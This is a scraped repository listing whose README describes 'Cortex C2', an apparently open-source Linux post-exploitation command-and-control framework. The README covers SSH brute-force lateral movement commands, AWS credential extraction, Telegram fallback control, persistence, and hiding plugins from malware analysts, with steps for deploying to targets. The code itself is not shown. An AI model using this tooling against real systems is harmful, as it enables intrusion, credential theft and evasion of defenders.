[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-81908":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":15,"stars7d":15,"stars30d":16,"stars90d":14,"forks30d":14,"starsTrendScore":16,"compositeScore":17,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":18,"fork":18,"defaultBranch":19,"hasWiki":20,"hasPages":18,"topics":21,"createdAt":9,"pushedAt":9,"updatedAt":22,"readmeContent":23,"aiSummary":24,"trendingCount":14,"starSnapshotCount":14,"syncStatus":12,"lastSyncTime":25,"discoverSource":26},81908,"cortex-c2","josephrw12\u002Fcortex-c2","josephrw12","Cortex C2 is an open source Linux C2 inspired by the void link C2 framework",null,"C",35,2,33,0,1,3,1.43,false,"main",true,[],"2026-06-12 02:04:21","# cortex-c2\nCortex C2 is an open source Linux post exploitation framework inspired by the void link C2 framework, and my implementation was built for embedded device security research, CTF use and for educational purposes only.\n\nhttps:\u002F\u002Fwww.sysdig.com\u002Fblog\u002Fvoidlink-threat-analysis-sysdig-discovers-c2-compiled-kernel-rootkits\n\nhttps:\u002F\u002Fwww.ontinue.com\u002Fresource\u002Fvoidlink-dissecting-an-ai-generated-c2-implant\u002F\n\n# UPDATE \n - All future updates will be in the .\u002Fv2 folder\n\n## High level Functionality\n - The agent folder contains several python scripts that read commands from the custom DB, execute those commands and write the result back to the custom DB, and the team server just writes the commands needed to be executed on the target to the DB and reads the result of the commands from the DB\n - I included a plugins folder in the agent that includes a few Core plugins\n - The on_demand_plugins folder will hold the plugins downloaded from the team server; the purpose of this is to load only the 
required plugins and to hide all of the rest from malware analysts (The malware developer and maintainer of this blog gave me the idea to do that: https:\u002F\u002Fsabotagesec.com\u002F )\n\n## Current State\n - In its current state I would consider this as a C2 template that you can extend as you wish\n - This project will never be perfect, but I will do my best to make it useful to the community. \n - It is language independent: you can build and extend it in whatever language you wish\n - It can run any Linux system command remotely\n - Perform persistence via a startup process (NOT TESTED SO DO NOT USE IT)\n - Privilege escalation via CVE 2026-43284 (Thanks to: Mykhailo Stepanov - https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fmykhailo-stepanov-57857a1a0\u002F) (NOT TESTED SO DO NOT USE IT)\n - Perform lateral movement via SSH brute force\n - Download additional plugins on demand\n - Fallback Telegram C2\n - File upload (upload http:\u002F\u002F127.0.0.1:5000.com\u002Fupload .\u002Fexample.txt) -> example.txt must be a path relative to the root of the orchestration folder\n - File download (download http:\u002F\u002Fany-domain.com\u002Fexample.txt ..\u002F..\u002Fexample.txt) -> Make sure you don't overwrite anything in the orchestration folder by downloading files into it\n - AWS credential extractor on-demand plugin (read .\u002Fteam_server\u002Fdownloads\u002Fsrc\u002Fcloud\u002FAWS\u002Fextract_credentials\u002Fgolang\u002FREADME.md)  \n\n## Features\n- Modular and extensible\n- Custom JSON database\n- Custom DB communication protocol at the application layer\n- Team Server (Windows \u002F Linux \u002F Mac) - But you will have to cross compile the binaries in the .\u002Fteam_server\u002Fdownloads\u002Fsrc folder for Linux if you are on Mac or Windows \n- The agent and db run only on Linux\n- Supports using Telegram as a C2 (Read the README.md file at .\u002Fteam_server\u002Fdownloads\u002Fsrc\u002Fgo\u002Ftelegram_c2\u002FREADME.md)\n\n## Usage\n\n### Manual 
\n- Compile any C source code files as necessary: gcc -g -o \u003Coutput_binary_name> \u003Cc_source_file_name> (Make sure the binary name is the same as the source file name) and also the main.go file in (.\u002Fagent\u002Fplugins\u002Fgo\u002Flateral_movement) \n- Compile the db_server_2.c file and run the db_server_2 binary in the .\u002Fdb folder \n- Edit the configuration details according to your setup in the config.py file in .\u002Fagent\u002Forchestration\u002Fconfig.py\n- Activate the team server in the .\u002Fteam_server folder\n  - activate a python virtual environment\n  - python3 -m venv venv\n  - source venv\u002Fbin\u002Factivate\n  - pip install flask flask-cors\n  - python3 app_2.py (if the DB server runs somewhere other than on localhost then: TCP_HOST=1\u003CDB IP> TCP_PORT=9100 python3 app_2.py)\n- Open the index.html file in the .\u002Fteam_server_client folder and issue commands (if the team server runs somewhere other than on the same machine as the client, edit the API_URL in the client)\n- The team server client can run commands on compromised devices, list all compromised devices and show command history for all commands run on the compromised devices\n\n### Automated\n```bash\nchmod +x .\u002Fbuild.sh\nchmod +x .\u002Fbuild_db.sh\nchmod +x run.sh\n\n.\u002Fbuild.sh\n.\u002Fbuild_db.sh\n.\u002Frun.sh\n```\n\n- Activate the team server in the .\u002Fteam_server folder\n  - activate a python virtual environment\n  - python3 -m venv venv\n  - source venv\u002Fbin\u002Factivate\n  - pip install flask flask-cors\n  - python3 app_2.py\n\n## Production Usage\n - After running the 2 build scripts deploy only the dist folder onto the target environment\n - The db server and the team server and the team server client must run on the attacker infrastructure\n - Set the variables in the .\u002Fdist\u002Forchestration\u002Fconfig.py according to your setup prior to deployment\n\n### Running commands\n- Open 
.\u002Fteam_server_client\u002Findex.html in a web browser\n1.  List compromised devices \n![List compromised devices](https:\u002F\u002Fres.cloudinary.com\u002Fdjsyg3fii\u002Fimage\u002Fupload\u002Fv1779621149\u002Fc2_1_a9g9b2.jpg)\n\n2. Run a command on the compromised device\n![Run a command](https:\u002F\u002Fres.cloudinary.com\u002Fdjsyg3fii\u002Fimage\u002Fupload\u002Fv1779621149\u002Fc2_2_sdja89.jpg)\n\n3. See all commands run on the target\n![View command history](https:\u002F\u002Fres.cloudinary.com\u002Fdjsyg3fii\u002Fimage\u002Fupload\u002Fv1779621149\u002Fc2_3_tpjssx.jpg)\n\n\n - Enter a regular Linux command into the team server client\n - For lateral movement, if you prefer to use the built-in golang plugin, use the commands below \n   ```\n   # Edit the usernames.txt and passwords.txt file in the .\u002Fdist\u002Forchestration folder\n   lateral_movement:..\u002Fplugins\u002Fgo\u002Flateral_movement\u002Fmain:-host:\u003Ctarget IP>:-port:\u003CSSH Server PORT>:-delay:500ms\n   # Once the command has been run on the target\n   cat lateral_output.txt\n\n   ```\n - The agent is purposely built to stop the same command from executing over and over again, so if you issue a command like plugin_download:rpibot and you see an error but you wish to run that command again, then run plugin_download:rpibot-somerandom-text and following that run plugin_download:rpibot once again \n   \n - To download plugins on demand (Thanks for the idea to: https:\u002F\u002Fsabotagesec.com\u002F)\n - plugin_v1.bin is a benign plugin I placed in the team_server\u002Fdownloads folder; you can compile and place your own plugins in the .\u002Fteam_server\u002Fdownloads folder\n```\nplugin_download:plugin_v1.bin\n\n# or any other binary you compile and place in the downloads folder for example the telegram c2 bot\nplugin_download:rpibot\n\n# to run the on demand plugins\nplugin_run:\u003CYour plugin>\n# example\nplugin_run:rpibot\n```  \n## Extend \n- To extend the agent functionality 
edit the python files in the .\u002Fagent\u002Forchestration folder, for example to include your own custom commands you would edit plugins.py\n- Since it's language independent you can edit each component as you wish, for example: db, team_server\n\n## Todo\n- Implement plugins for container service exploitation\n- Hopefully make it cloud native sometime in the future -> Currently it has a plugin to extract AWS credentials\n- Include a server side rendered root kit\n- Create a multi stage loader to load the .\u002Fdist folder\n\n## Important\n- Open an Issue if you run into any errors while trying to use it\n- Successfully tested on an Arm Cortex-A53 processor\n- My framework is not as evasive as the void link framework\n- This is work in progress, and I do not know how far this will go, your support is highly appreciated, and I am open to accepting your contributions to the project (read the contributing.md file)\n- I used claude ai to speed up the build process\n- It's named Cortex because I am currently testing it out on a Cortex CPU System \n- Visit my web site at https:\u002F\u002Fcyberigniter.link\n\n\n## Books \n- The linux programming interface by Michael Kerrisk\nhttps:\u002F\u002Fman7.org\u002Ftlpi\u002F\n\n\n\n\n","Cortex C2 is an open source Linux post-exploitation framework inspired by the Void Link C2 framework, intended mainly for embedded device security research, CTF competitions and educational purposes. Its core functionality includes reading, writing and executing commands through a custom database, support for plugin extension and on-demand download to hide non-essential components, and the use of Telegram as a fallback control channel. In addition, the framework provides remote execution of system commands, a persistence mechanism (untested), privilege escalation (based on a specific CVE, untested), lateral movement and other functions. Cortex C2 is designed to be modular and extensible, allowing users to build and extend it in any language as needed. The project is suited to security researchers and technology enthusiasts who need deep control and analysis of target Linux systems.","2026-06-11 04:07:10","CREATED_QUERY"]